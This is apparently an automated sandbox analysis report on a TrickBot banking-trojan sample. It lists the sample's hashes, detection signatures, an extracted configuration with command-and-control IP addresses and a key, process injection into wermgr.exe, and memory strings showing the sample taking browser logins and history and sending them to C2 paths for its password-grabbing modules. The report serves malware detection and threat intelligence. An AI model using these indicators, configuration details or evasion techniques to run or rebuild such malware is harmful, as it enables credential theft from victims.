Windows Analysis Report dngqoAXyDd.exe

Overview

General Information

Sample Name: dngqoAXyDd.exe
Analysis ID: 516930
MD5: 0afbb383c5cea9f11202d572141bb0f4
SHA1: 148266112b25087f10ac1124ea32630e48fb0bd9
SHA256: 6a910ec8055b3844e3dd14c7af08a68110abc9395a88ab9199e69ed07be27210
Infos:

Most interesting Screenshot:

Detection

TrickBot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Multi AV Scanner detection for submitted file
Found detection on Joe Sandbox Cloud Basic with higher score
Sigma detected: Suspect Svchost Activity
Writes to foreign memory regions
Hijacks the control flow in another process
May check the online IP address of the machine
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Sigma detected: Suspicious Svchost Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp Malware Configuration Extractor: Trickbot {"ver": "100019", "gtag": "top147", "servs": ["65.152.201.203:443", "185.56.175.122:443", "46.99.175.217:443", "179.189.229.254:443", "46.99.175.149:443", "181.129.167.82:443", "216.166.148.187:443", "46.99.188.223:443", "128.201.76.252:443", "62.99.79.77:443", "60.51.47.65:443", "24.162.214.166:443", "45.36.99.184:443", "97.83.40.67:443", "184.74.99.214:443", "103.105.254.17:443", "62.99.76.213:443", "82.159.149.52:443"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAABbfmkJRvwyw7iFkX40hL2HwsUeOSZZZo0FRRWGkY6J1+gf3YKq13Ee4sY3Jb9/0myCr0MwzNK1K2l5yuY87nW29Q/yjMJG0ISDj0HNBC3G+ZGta6Oi9QkjCwnNGbw2hQ4="}
Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 5016, type: MEMORYSTR
Source: Yara match File source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for submitted file
Source: dngqoAXyDd.exe Virustotal: Detection: 27% Perma Link
Source: dngqoAXyDd.exe ReversingLabs: Detection: 28%

Compliance:

barindex
Uses 32bit PE files
Source: dngqoAXyDd.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown HTTPS traffic detected: 46.99.175.217:443 -> 192.168.11.20:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 24.45.255.9:443 -> 192.168.11.20:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 202.58.199.82:443 -> 192.168.11.20:49800 version: TLS 1.2
Source: dngqoAXyDd.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\sample exe lego\correctmodel.pdb source: dngqoAXyDd.exe
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECD0960 FindFirstFileW,FindNextFileW, 3_2_000001767ECD0960
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC7120 FindFirstFileW,FindNextFileW, 3_2_000001767ECC7120

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECCFA20
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECD3990
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 3_2_000001767ECC4D50
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECCB520
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECC0A00
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec ecx 3_2_000001767ECCFBA0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECCFBA0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then cmp dword ptr [eax], ecx 3_2_000001767ECBA3B0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov byte ptr [esp+ecx+70h], cl 3_2_000001767ECD5F60
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECBE320
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECD5EC0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 3_2_000001767ECB6EF0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECC4060
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 3_2_000001767ECC9460
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECB4470
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov ebx, edx 3_2_000001767ECB4470
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECB2BC0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc ebp 3_2_000001767ECB5BE0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx ecx, byte ptr [ebp-07h] 3_2_000001767ECCE3F0

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.11.20:49778 -> 46.99.175.217:443
Source: Traffic Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.11.20:49809 -> 103.75.32.173:443
May check the online IP address of the machine
Source: unknown DNS query: name: ip.anysrc.net
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: IPKO-ASAL IPKO-ASAL
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 72a589da586844d7f0818ce684948eea
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 46.99.175.217 46.99.175.217
Source: Joe Sandbox View IP Address: 116.203.16.95 116.203.16.95
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Sat, 06 Nov 2021 14:12:52 GMTContent-Length: 9Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.14.2Date: Sat, 06 Nov 2021 14:14:12 GMTContent-Length: 9Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: Cookies.bak.13.dr String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: Cookies.bak.13.dr String found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
Source: Cookies.bak.13.dr String found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://103.11.218.199:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://103.111.83.86:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://103.75.32.173:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://110.38.58.198:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://114.7.243.26:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://116.206.62.138:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://117.54.140.98:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://138.94.162.29:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://139.255.41.122:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://175.184.232.234:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://186.96.153.223:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://190.183.60.164:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://196.44.109.73:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://202.152.56.10:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://206.251.37.27:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://27.109.116.144:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://36.95.73.109:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://45.115.174.234:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://45.115.174.60:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://45.116.68.109:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://45.221.8.171:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://64.64.150.203:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp, wermgr.exe, 00000003.00000002.14252607616.0000017631B36000.00000004.00000040.sdmp String found in binary or memory: http://80.210.26.17:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://96.9.69.207:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp String found in binary or memory: http://96.9.74.169:443
Source: History.bak.13.dr String found in binary or memory: http://alldrivers4devices.net/download.php?driver=Drv5609xx-zip&key=lib
Source: History.bak.13.dr String found in binary or memory: http://alldrivers4devices.net/download.php?driver=Drv5609xx-zip&key=libDriver
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wermgr.exe, 00000003.00000003.10158119791.000001767EE18000.00000004.00000001.sdmp String found in binary or memory: http://ip.anysrc.net/
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp String found in binary or memory: http://ip.anysrc.net/plain
Source: History.bak.13.dr String found in binary or memory: http://office.com/setup
Source: History.bak.13.dr String found in binary or memory: http://packetstormsecurity.com/files/22459/BIOS320.EXE.html
Source: History.bak.13.dr String found in binary or memory: http://www.alldrivers4devices.net/blogstat/click.php?f=bios320_exe64bit.rar%3E%3Cspan%20style=
Source: History.bak.13.dr String found in binary or memory: http://www.alldrivers4devices.net/blogstat/click.php?f=bios320_exe64bit.rar%3E%3Cspan%20style=Driver
Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp String found in binary or memory: https://202.58.199.82/S/6a
Source: wermgr.exe, 00000003.00000003.10158605588.000001767EE77000.00000004.00000001.sdmp String found in binary or memory: https://202.58.199.82/roviderg/
Source: wermgr.exe, 00000003.00000003.10159260701.00000176321C5000.00000004.00000001.sdmp, wermgr.exe, 00000003.00000003.10158605588.000001767EE77000.00000004.00000001.sdmp String found in binary or memory: https://202.58.199.82/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/
Source: wermgr.exe, 00000003.00000002.14258955412.000001767EEA2000.00000004.00000020.sdmp, wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp String found in binary or memory: https://202.58.199.82/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabc64/
Source: wermgr.exe, 00000003.00000003.10159260701.00000176321C5000.00000004.00000001.sdmp String found in binary or memory: https://202.58.199.82:443/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/
Source: wermgr.exe, 00000003.00000002.14255586044.00000176321C0000.00000004.00000001.sdmp String found in binary or memory: https://202.58.199.82:443/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabc64/
Source: wermgr.exe, 00000003.00000002.14257936566.000001767EDF4000.00000004.00000020.sdmp String found in binary or memory: https://24.4
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp String found in binary or memory: https://24.45.255.9/
Source: wermgr.exe, 00000003.00000003.9460440503.000001767EE9B000.00000004.00000001.sdmp String found in binary or memory: https://24.45.255.9/index.html
Source: wermgr.exe, 00000003.00000003.10159260701.00000176321C5000.00000004.00000001.sdmp String found in binary or memory: https://24.45.255.9:443/index.html
Source: wermgr.exe, 00000003.00000003.10159260701.00000176321C5000.00000004.00000001.sdmp String found in binary or memory: https://24.45.255.9:443/login.cgi?uri=/index.html#
Source: wermgr.exe, 00000003.00000002.14255875326.00000176321EA000.00000004.00000001.sdmp, wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp String found in binary or memory: https://46.99.175.217/
Source: wermgr.exe, 00000003.00000002.14257724203.000001767EDDE000.00000004.00000020.sdmp String found in binary or memory: https://46.99.175.217/rovider
Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp String found in binary or memory: https://46.99.175.217/roviders/
Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp String found in binary or memory: https://46.99.175.217/roviderw/
Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/10/62/LDBHBJFHFNV/1/
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/10/62/LDBHBJFHFNV/1/g
Source: wermgr.exe, 00000003.00000002.14255586044.00000176321C0000.00000004.00000001.sdmp String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/10/62/LDBHBJFHFNV/1/t
Source: wermgr.exe, 00000003.00000003.10158119791.000001767EE18000.00000004.00000001.sdmp, wermgr.exe, 00000003.00000003.9460390964.000001767EE92000.00000004.00000001.sdmp String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/NAT%20status/clien
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/DEBG//
Source: wermgr.exe, 00000003.00000002.14257936566.000001767EDF4000.00000004.00000020.sdmp String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/DEBG//0u0u
Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/DEBG//Q
Source: wermgr.exe, 00000003.00000002.14257825391.000001767EDE7000.00000004.00000020.sdmp, wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/VERS//
Source: wermgr.exe, 00000003.00000002.14255586044.00000176321C0000.00000004.00000001.sdmp String found in binary or memory: https://46.99.175.217:443/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/dpost/
Source: wermgr.exe, 00000003.00000002.14255586044.00000176321C0000.00000004.00000001.sdmp String found in binary or memory: https://46.99.175.217:443/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/DEBG//
Source: Web Data.bak.13.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: History.bak.13.dr String found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
Source: History.bak.13.dr String found in binary or memory: https://aka.office.com/office/url/setup
Source: History.bak.13.dr String found in binary or memory: https://aka.office.com/office/url/setupMicrosoft
Source: History.bak.13.dr String found in binary or memory: https://alldrivers4devices.net/download.php?driver=Drv5609xx-zip&key=lib
Source: History.bak.13.dr String found in binary or memory: https://alldrivers4devices.net/download.php?driver=Drv5609xx-zip&key=libDriver
Source: History.bak.13.dr String found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: Web Data.bak.13.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: History.bak.13.dr String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: History.bak.13.dr String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: History.bak.13.dr String found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: Web Data.bak.13.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data.bak.13.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data.bak.13.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wermgr.exe, 00000003.00000003.9460033673.00000176321DB000.00000004.00000001.sdmp String found in binary or memory: https://itunes.apple.com/us/app/umobile-ubnt/id1183022489?mt=8
Source: History.bak.13.dr String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: Login Data.bak.13.dr String found in binary or memory: https://login.live.com/
Source: Login Data.bak.13.dr String found in binary or memory: https://login.live.com//
Source: Login Data.bak.13.dr String found in binary or memory: https://login.live.com/https://login.live.com/
Source: History.bak.13.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306401&rver=7.0.6738.0&wp=M
Source: History.bak.13.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
Source: History.bak.13.dr String found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
Source: Login Data.bak.13.dr String found in binary or memory: https://login.live.com/v104
Source: History.bak.13.dr String found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
Source: History.bak.13.dr String found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
Source: History.bak.13.dr String found in binary or memory: https://office.com/setup
Source: History.bak.13.dr String found in binary or memory: https://office.com/setupMicrosoft
Source: History.bak.13.dr String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
Source: History.bak.13.dr String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmlBIOS320.EXE
Source: History.bak.13.dr String found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
Source: History.bak.13.dr String found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXEDownload:
Source: History.bak.13.dr String found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: wermgr.exe, 00000003.00000003.9460033673.00000176321DB000.00000004.00000001.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=com.ubnt.umobile
Source: History.bak.13.dr String found in binary or memory: https://recoveringlib.blogspot.com/2015/04/bios320exe-64-bit.html
Source: History.bak.13.dr String found in binary or memory: https://recoveringlib.blogspot.com/2015/04/bios320exe-64-bit.htmlBios320.Exe
Source: History.bak.13.dr String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/?ms.officeurl=setup
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/?ms.officeurl=setupMicrosoft
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2V
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSign
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8-_
Source: History.bak.13.dr String found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: History.bak.13.dr String found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: Web Data.bak.13.dr String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: Web Data.bak.13.dr String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: History.bak.13.dr String found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.html
Source: History.bak.13.dr String found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.htmlBios320.Exe
